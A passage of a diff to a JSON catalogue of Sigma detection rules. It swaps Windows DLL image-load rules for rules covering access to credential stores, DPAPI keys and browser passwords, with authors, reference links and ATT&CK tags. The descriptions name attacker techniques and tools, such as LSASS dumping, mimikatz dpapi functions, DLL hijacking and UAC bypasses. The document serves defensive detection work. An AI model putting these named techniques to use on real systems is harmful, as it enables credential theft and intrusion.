"https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/TTPs/Defense%20Evasion/T1218%20-%20Signed%20Binary%20Proxy%20Execution/T1218.003%20-%20CMSTP/Procedures.yaml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_cmstp.yml" + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://hunter2.gitbook.io/darthsidious/privilege-escalation/mimikatz", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_credential_manager_stealing.yml" ], "tags": [ - "attack.defense_evasion", - "attack.t1218.003" + "attack.t1003", + "attack.credential_access" ] }, - "uuid": "75e508f7-932d-4ebc-af77-269237a84ce1", - "value": "Cmstp Suspicious DLL Load" + "uuid": "407aecb1-e762-4acf-8c7b-d087bcff3bb6", + "value": "Credential Manager Access" }, { - "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", + "description": "Detects suspicious processes based on name and location that access the Windows Data Protection API Master keys.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::masterkey\" function\n", "meta": { - "author": "Perez Diego (@darkquassar), oscd.community, Ecco", - "creation_date": "2019/10/27", + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/17", "falsepositive": [ "Unknown" ], - "filename": "image_load_susp_dbghelp_dbgcore_load.yml", - "level": "high", - "logsource.category": "image_load", + "filename": "file_access_win_dpapi_master_key_access.yml", + "level": "medium", + "logsource.category": "file_access", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump", - "https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html", - "https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_dbghelp_dbgcore_load.yml" + "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords", + "https://web.archive.org/web/20181130065817/http://www.harmj0y.net/blog/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_dpapi_master_key_access.yml" ], "tags": [ "attack.credential_access", - "attack.t1003.001" + "attack.t1555.004" ] }, - "uuid": "0e277796-5f23-4e49-a490-483131d4f6e1", - "value": "Load of dbghelp/dbgcore DLL from Suspicious Process" + "uuid": "46612ae6-86be-4802-bc07-39b59feb1309", + "value": "Suspicious Access To Windows DPAPI Master Keys" }, { - "description": "Detects when a system process (ie located in system32, syswow64...etc) loads a DLL from a suspicious location such as %temp%", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/17", - "falsepositive": [ - "Unknown" - ], - "filename": "image_load_susp_dll_load_system_process.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC (Idea)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_dll_load_system_process.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070" - ] - }, - "uuid": "9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", - "value": "DLL Load By System Process From Suspicious Locations" - }, - { - "description": "The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.", - "meta": { - "author": "NVISO", - "creation_date": "2020/05/04", - "falsepositive": [ - "Unlikely" - ], - "filename": "image_load_susp_fax_dll.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://windows-internals.com/faxing-your-way-to-system/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_fax_dll.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.001", - "attack.t1574.002" - ] - }, - "uuid": "828af599-4c53-4ed2-ba4a-a9f835c434ea", - "value": "Fax Service DLL Search Order Hijack" - }, - { - "description": "Detects any assembly DLL being loaded by an Office Product", - "meta": { - "author": "Antonlovesdnb", - "creation_date": "2020/02/19", - "falsepositive": [ - "Alerts on legitimate macro usage as well, will need to filter as appropriate" - ], - "filename": "image_load_susp_office_dotnet_assembly_dll_load.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_dotnet_assembly_dll_load.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204.002" - ] - }, - "uuid": "ff0f2b05-09db-4095-b96d-1b75ca24894a", - "value": "dotNET DLL Loaded Via Office Applications" - }, - { - "description": "Detects CLR DLL being loaded by an Office Product", - "meta": { - "author": "Antonlovesdnb", - "creation_date": "2020/02/19", - "falsepositive": [ - "Alerts on legitimate macro usage as well, will need to filter as appropriate" - ], - "filename": "image_load_susp_office_dotnet_clr_dll_load.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_dotnet_clr_dll_load.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204.002" - ] - }, - "uuid": "d13c43f0-f66b-4279-8b2c-5912077c1780", - "value": "CLR DLL Loaded Via Office Applications" - }, - { - "description": "Detects any GAC DLL being loaded by an Office Product", - "meta": { - "author": "Antonlovesdnb", - "creation_date": "2020/02/19", - "falsepositive": [ - "Alerts on legitimate macro usage as well, will need to filter as appropriate" - ], - "filename": "image_load_susp_office_dotnet_gac_dll_load.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_dotnet_gac_dll_load.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204.002" - ] - }, - "uuid": "90217a70-13fc-48e4-b3db-0d836c5824ac", - "value": "GAC DLL Loaded Via Office Applications" - }, - { - "description": "Detects DSParse DLL being loaded by an Office Product", - "meta": { - "author": "Antonlovesdnb", - "creation_date": "2020/02/19", - "falsepositive": [ - "Alerts on legitimate macro usage as well, will need to filter as appropriate" - ], - "filename": "image_load_susp_office_dsparse_dll_load.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_dsparse_dll_load.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204.002" - ] - }, - "uuid": "a2a3b925-7bb0-433b-b508-db9003263cc4", - "value": "Active Directory Parsing DLL Loaded Via Office Applications" - }, - { - "description": "Detects Kerberos DLL being loaded by an Office Product", - "meta": { - "author": "Antonlovesdnb", - "creation_date": "2020/02/19", - "falsepositive": [ - "Alerts on legitimate macro usage as well, will need to filter as appropriate" - ], - "filename": "image_load_susp_office_kerberos_dll_load.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_kerberos_dll_load.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204.002" - ] - }, - "uuid": "7417e29e-c2e7-4cf6-a2e8-767228c64837", - "value": "Active Directory Kerberos DLL Loaded Via Office Applications" - }, - { - "description": "Detects the image load of Python Core indicative of a Python script bundled with Py2Exe.", - "meta": { - "author": "Patrick St. John, OTR (Open Threat Research)", - "creation_date": "2020/05/03", - "falsepositive": [ - "Legitimate Py2Exe Binaries", - "Known false positive caused with Python Anaconda" - ], - "filename": "image_load_susp_python_image_load.yml", - "level": "medium", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://www.py2exe.org/", - "https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_python_image_load.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027.002" - ] - }, - "uuid": "cbb56d62-4060-40f7-9466-d8aaf3123f83", - "value": "Python Py2Exe Image Load" - }, - { - "description": "Detects CLR DLL being loaded by an scripting applications", - "meta": { - "author": "omkar72, oscd.community", - "creation_date": "2020/10/14", - "falsepositive": [ - "Unknown" - ], - "filename": "image_load_susp_script_dotnet_clr_dll_load.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://github.com/tyranid/DotNetToJScript", - "https://thewover.github.io/Introducing-Donut/", - "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml" - ], - "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1055" - ] - }, - "uuid": "4508a70e-97ef-4300-b62b-ff27992990ea", - "value": "CLR DLL Loaded Via Scripting Applications" - }, - { - "description": "A General detection for processes loading System.Drawing.ni.dll. This could be an indicator of potential Screen Capture.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/05/02", - "falsepositive": [ - "Unknown" - ], - "filename": "image_load_susp_system_drawing_load.yml", - "level": "low", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/16", - "https://threathunterplaybook.com/evals/apt29/detections/7.A.1_3B4E5808-3C71-406A-B181-17B0CE3178C9.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_system_drawing_load.yml" - ], - "tags": [ - "attack.collection", - "attack.t1113" - ] - }, - "uuid": "666ecfc7-229d-42b8-821e-1a8f8cb7057c", - "value": "Suspicious System.Drawing Load" - }, - { - "description": "Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz", - "meta": { - "author": "Markus Neis", - "creation_date": "2018/01/07", - "falsepositive": [ - "Very likely, needs more tuning" - ], - "filename": "image_load_susp_uncommon_image_load.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_uncommon_image_load.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ] - }, - "uuid": "e32ce4f5-46c6-4c47-ba69-5de3c9193cd7", - "value": "Possible Process Hollowing Image Loading" - }, - { - "description": "Detects the image load of VSS DLL by uncommon executables", + "description": "Detects suspicious processes based on name and location that access the browser credential stores which can be the sign of credential stealing", "meta": { "author": "frack113", - "creation_date": "2022/10/31", + "creation_date": "2022/04/09", "falsepositive": [ - "Unknown" + "Antivirus, Anti-Spyware, Anti-Malware Software", + "Backup software", + "Software installed on other partitions other than \"C:\\\"", + "Searching software such as \"everything.exe\" that are installed and are not located in one of the \"filter_programfile\" filter entries" ], - "filename": "image_load_susp_vss_dll_load.yml", - "level": "high", - "logsource.category": "image_load", + "filename": "file_access_win_browser_credential_stealing.yml", + "level": "medium", + "logsource.category": "file_access", "logsource.product": "windows", "refs": [ - "https://github.com/ORCx41/DeleteShadowCopies", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_vss_dll_load.yml" + "https://www.zscaler.com/blogs/security-research/ffdroider-stealer-targeting-social-media-platform-users", + "https://github.com/lclevy/firepwd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_browser_credential_stealing.yml" ], "tags": [ - "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.t1003", + "attack.credential_access" ] }, - "uuid": "37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", - "value": "Image Load of VSS Dll by Uncommon Executable" + "uuid": "91cb43db-302a-47e3-b3c8-7ede481e27bf", + "value": "Browser Credential Store Access" }, { - "description": "Detects the image load of vss_ps.dll by uncommon executables", - "meta": { - "author": "Markus Neis, @markus_neis", - "creation_date": "2021/07/07", - "falsepositive": [ - "Unknown" - ], - "filename": "image_load_susp_vss_ps_load.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://www.virustotal.com/gui/file/ba88ca45589fae0139a40ca27738a8fc2dfbe1be5a64a9558f4e0f52b35c5add", - "https://twitter.com/am0nsec/status/1412232114980982787", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_vss_ps_load.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.impact", - "attack.t1490" - ] - }, - "uuid": "333cdbe8-27bb-4246-bf82-b41a0dca4b70", - "value": "Image Load of VSS_PS.dll by Uncommon Executable" - }, - { - "description": "Detects DLL's Loaded Via Word Containing VBA Macros", - "meta": { - "author": "Antonlovesdnb", - "creation_date": "2020/02/19", - "falsepositive": [ - "Alerts on legitimate macro usage as well, will need to filter as appropriate" - ], - "filename": "image_load_susp_winword_vbadll_load.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_winword_vbadll_load.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204.002" - ] - }, - "uuid": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", - "value": "VBA DLL Loaded Via Microsoft Word" - }, - { - "description": "IKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\\Windows\\System32\\ by default.\nAn attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services \"svchost.exe -k netsvcs\" to gain code execution on a remote machine.\n", - "meta": { - "author": "SBousseaden", - "creation_date": "2019/10/28", - "falsepositive": [ - "Unknown" - ], - "filename": "image_load_svchost_dll_search_order_hijack.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_svchost_dll_search_order_hijack.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1574.001" - ] - }, - "uuid": "602a1f13-c640-4d73-b053-be9a2fa58b77", - "value": "Svchost DLL Search Order Hijack" - }, - { - "description": "Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool to tamper with Windows event logs", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/09/07", - "falsepositive": [ - "Other DLLs with that import hash" - ], - "filename": "image_load_sysmon_disable_sharpevtmute.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://github.com/bats3c/EvtMute", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_sysmon_disable_sharpevtmute.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.002" - ] - }, - "uuid": "49329257-089d-46e6-af37-4afce4290685", - "value": "SharpEvtMute Imphash EvtMuteHook Load" - }, - { - "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", - "meta": { - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", - "creation_date": "2020/10/06", - "falsepositive": [ - "Legitimate usage by software developers/testers" - ], - "filename": "image_load_tttracer_mod_load.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/", - "https://twitter.com/mattifestation/status/1196390321783025666", - "https://twitter.com/oulusoyum/status/1191329746069655553", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_tttracer_mod_load.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.credential_access", - "attack.t1218", - "attack.t1003.001" - ] - }, - "uuid": "e76c8240-d68f-4773-8880-5c6f63595aaf", - "value": "Time Travel Debugging Utility Usage - Image" - }, - { - "description": "Detects the \"iscsicpl.exe\" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%", + "description": "Detects suspicious processes based on name and location that access the Windows Credential History File.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::credhist\" function\n", "meta": { "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/17", + "creation_date": "2022/10/17", "falsepositive": [ "Unknown" ], - "filename": "image_load_uac_bypass_iscsicpl.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC", - "https://twitter.com/wdormann/status/1547583317410607110", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ] - }, - "uuid": "9ed5959a-c43c-4c59-84e3-d28628429456", - "value": "UAC Bypass Using Iscsicpl - ImageLoad" - }, - { - "description": "Attempts to load dismcore.dll after dropping it", - "meta": { - "author": "oscd.community, Dmitry Uchakin", - "creation_date": "2020/10/06", - "falsepositive": [ - "Actions of a legitimate telnet client" - ], - "filename": "image_load_uac_bypass_via_dism.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://steemit.com/utopian-io/@ah101/uac-bypassing-utility", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uac_bypass_via_dism.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1574.002" - ] - }, - "uuid": "a5ea83a7-05a5-44c1-be2e-addccbbd8c03", - "value": "UAC Bypass With Fake DLL" - }, - { - "description": "Detects potential use of UIPromptForCredentials functions by looking for some of the DLLs needed for it.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/10/20", - "falsepositive": [ - "Other legitimate processes loading those DLLs in your environment." - ], - "filename": "image_load_uipromptforcreds_dlls.yml", + "filename": "file_access_win_susp_cred_hist_access.yml", "level": "medium", - "logsource.category": "image_load", + "logsource.category": "file_access", "logsource.product": "windows", "refs": [ - "https://securitydatasets.com/notebooks/small/windows/06_credential_access/SDWIN-201020013208.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md#atomic-test-2---powershell---prompt-user-for-password", - "https://docs.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-creduipromptforcredentialsa", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml" + "https://www.passcape.com/windows_password_recovery_dpapi_credhist", + "https://tools.thehacker.recipes/mimikatz/modules/dpapi/credhist", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_susp_cred_hist_access.yml" ], "tags": [ "attack.credential_access", - "attack.collection", - "attack.t1056.002" + "attack.t1555.004" ] }, - "uuid": "9ae01559-cf7e-4f8e-8e14-4c290a1b4784", - "value": "UIPromptForCredentials DLLs" + "uuid": "7a2a22ea-a203-4cd3-9abf-20eb1c5c6cd2", + "value": "Suspicious Access To Windows Credential History File" }, { - "description": "Loading unsigned image (DLL, EXE) into LSASS process", + "description": "Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", "meta": { - "author": "Teymur Kheirkhabarov, oscd.community", - "creation_date": "2019/10/22", - "falsepositive": [ - "Valid user connecting using RDP" - ], - "filename": "image_load_unsigned_image_loaded_into_lsass.yml", - "level": "medium", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_unsigned_image_loaded_into_lsass.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ] - }, - "uuid": "857c8db3-c89b-42fb-882b-f681c7cf4da2", - "value": "Unsigned Image Loaded Into LSASS Process" - }, - { - "description": "Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/09/07", - "falsepositive": [ - "Rarely observed" - ], - "filename": "image_load_usp_svchost_clfsw32.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_usp_svchost_clfsw32.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" - ] - }, - "uuid": "33a2d1dd-f3b0-40bd-8baf-7974468927cc", - "value": "APT PRIVATELOG Image Load Pattern" - }, - { - "description": "Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/02", - "falsepositive": [ - "Unlikely" - ], - "filename": "image_load_vmware_xfer_load_dll_from_nondefault_path.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_vmware_xfer_load_dll_from_nondefault_path.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ] - }, - "uuid": "9313dc13-d04c-46d8-af4a-a930cc55d93b", - "value": "VMware Xfer Loading DLL from Nondefault Path" - }, - { - "description": "Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc).", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/10/17", - "falsepositive": [ - "The command wmic os get lastboottuptime loads vbscript.dll", - "The command wmic os get locale loads vbscript.dll", - "Since the ImageLoad event doesn't have enough information in this case. It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights" - ], - "filename": "image_load_wmic_remote_xsl_scripting_dlls.yml", - "level": "medium", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://securitydatasets.com/notebooks/small/windows/05_defense_evasion/SDWIN-201017061100.html", - "https://twitter.com/dez_/status/986614411711442944", - "https://lolbas-project.github.io/lolbas/Binaries/Wmic/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1220" - ] - }, - "uuid": "06ce37c2-61ab-4f05-9ff5-b1a96d18ae32", - "value": "WMIC Loading Scripting Libraries" - }, - { - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/10/12", + "author": "Tim Rauch", + "creation_date": "2022/09/27", "falsepositive": [ "Unknown" ], - "filename": "image_load_wmiprvse_wbemcomn_dll_hijack.yml", + "filename": "file_change_win_unusual_modification_by_dns_exe.yml", "level": "high", - "logsource.category": "image_load", + "logsource.category": "file_change", "logsource.product": "windows", "refs": [ - "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009173318.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmiprvse_wbemcomn_dll_hijack.yml" + "https://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns.exe.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_change/file_change_win_unusual_modification_by_dns_exe.yml" ], "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "attack.initial_access", + "attack.t1133" ] }, - "uuid": "7707a579-e0d8-4886-a853-ce47e4575aaa", - "value": "Wmiprvse Wbemcomn DLL Hijack" + "uuid": "9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3", + "value": "Unusual File Modification by dns.exe" }, { - "description": "Detects non wmiprvse loading WMI modules", - "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g", - "creation_date": "2019/08/10", - "falsepositive": [ - "Unknown" - ], - "filename": "image_load_wmi_module_load.yml", - "level": "informational", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190811201010.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmi_module_load.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047" - ] - }, - "uuid": "671bb7e3-a020-4824-a00e-2ee5b55f385e", - "value": "WMI Modules Loaded" - }, - { - "description": "Detects WMI command line event consumers", - "meta": { - "author": "Thomas Patzke", - "creation_date": "2018/03/07", - "falsepositive": [ - "Unknown (data set is too small; further testing needed)" - ], - "filename": "image_load_wmi_persistence_commandline_event_consumer.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmi_persistence_commandline_event_consumer.yml" - ], - "tags": [ - "attack.t1546.003", - "attack.persistence" - ] - }, - "uuid": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6", - "value": "WMI Persistence - Command Line Event Consumer" - }, - { - "description": "Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/06/24", - "falsepositive": [ - "Unknown" - ], - "filename": "image_load_wsman_provider_image_load.yml", - "level": "medium", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/chadtilbury/status/1275851297770610688", - "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/", - "https://docs.microsoft.com/en-us/windows/win32/winrm/windows-remote-management-architecture", - "https://github.com/bohops/WSMan-WinRM", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wsman_provider_image_load.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.003" - ] - }, - "uuid": "ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94", - "value": "Suspicious WSMAN Provider Image Loads" - }, - { - "description": "Detects an executable in the Windows folder accessing github.com", - "meta": { - "author": "Michael Haag (idea), Florian Roth (rule)", - "creation_date": "2017/08/24", - "falsepositive": [ - "Unknown", - "@subTee in your network" - ], - "filename": "net_connection_win_binary_github_com.yml", - "level": "high", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/M_haggis/status/900741347035889665", - "https://twitter.com/M_haggis/status/1032799638213066752", - "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_binary_github_com.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1105", - "attack.exfiltration", - "attack.t1567.001" - ] - }, - "uuid": "635dbb88-67b3-4b41-9ea5-a3af2dd88153", - "value": "Microsoft Binary Github Communication" - }, - { - "description": "Detects an executable in the Windows folder accessing suspicious domains", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/08/30", - "falsepositive": [ - "Unknown" - ], - "filename": "net_connection_win_binary_susp_com.yml", - "level": "high", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/M_haggis/status/900741347035889665", - "https://twitter.com/M_haggis/status/1032799638213066752", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_binary_susp_com.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1105" - ] - }, - "uuid": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", - "value": "Microsoft Binary Suspicious Communication Endpoint" - }, - { - "description": "Detects a network connection intitiated by the certutil.exe tool. Attackers can abuse `certutil.exe` to download malware or offensive security tools.", + "description": "Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.\nNote that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.\n", "meta": { "author": "frack113, Florian Roth", - "creation_date": "2022/09/02", + "creation_date": "2022/08/12", "falsepositive": [ - "Legitimate certutil network connection" + "Changes made to or by the local NTP 